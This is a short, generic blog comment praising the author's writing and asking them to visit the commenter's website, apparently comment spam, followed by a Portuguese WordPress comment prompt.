    After going over a number of the blog articles on your blog, I truly like your technique of writing a blog. I book marked it to my bookmark site list and will be checking back in the near future. Please visit my website too and tell me how you feel.

Deixe o seu comentário aqui!

Publicado com o WordPress